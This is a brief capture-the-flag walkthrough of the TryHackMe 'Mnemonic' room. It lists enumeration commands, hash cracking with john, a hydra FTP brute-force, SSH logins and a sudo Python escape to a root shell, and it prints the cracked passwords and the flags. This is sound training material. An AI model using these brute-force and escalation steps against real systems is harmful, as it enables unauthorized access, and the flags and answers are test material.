Mnemonic

https://tryhackme.com/room/mnemonic

Mnemonic

No answer needed

Enumerate

How many open ports?

nmap -sC -sV -T5 -p1-65535 10.10.109.236

3

What is the ssh port number?

1337

What is the name of the secret file?

gobuster dir -u http://10.10.109.236 -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://10.10.109.236 -w big.txt -x php,txt,html -t 50

gobuster dir -u http://10.10.109.236/webmasters/ -w big.txt -x php,txt,html -t 50

gobuster dir -u http://10.10.109.236/webmasters/admin/ -w big.txt -x php,txt,html -t 50

gobuster dir -u http://10.10.109.236/webmasters/backups -w /usr/share/dirb/wordlists/common.txt -x sql,php,txt,css,zip,csv,dat,dbf,log,mdb,sav,tar,xml,cgi

backups.zip

Credentials

zip2john backups.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt

unzip backups.zip
00385007
cat backups/note.txt

ftp user name?

hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.109.236 -t 50 

ftpuser

ftp password?

love4ever

What is the ssh username?

james

What is the ssh password?

chmod 600 id_rsa
ssh -i id_rsa james@10.10.109.236

python3 /usr/share/john/ssh2john.py id_rsa > john_ssh.txt
john --wordlist=/usr/share/wordlists/rockyou.txt john_ssh.txt

bluelove

What is the condor password?

ssh james@10.10.109.239 -p 1337

git clone https://github.com/MustafaTanguner/Mnemonic
cd Mnemonic/
python3 -m pip install --user colored
python3 -m pip install --user opencv-python

python3 Mnemonic.py
/root/mnemonic/maxresdefault.jpg
2
/root/mnemonic/6450.txt

pasificbell1981

Hack the machine

user.txt

THM{a5f82a00e2feee3465249b855be71c01}

root.txt

ssh -p 1337 condor@10.10.109.239
sudo -l

sudo /usr/bin/python3 /bin/examplecode.py
0
.
/bin/bash

THM{2a4825f50b0c16636984b448669b0586}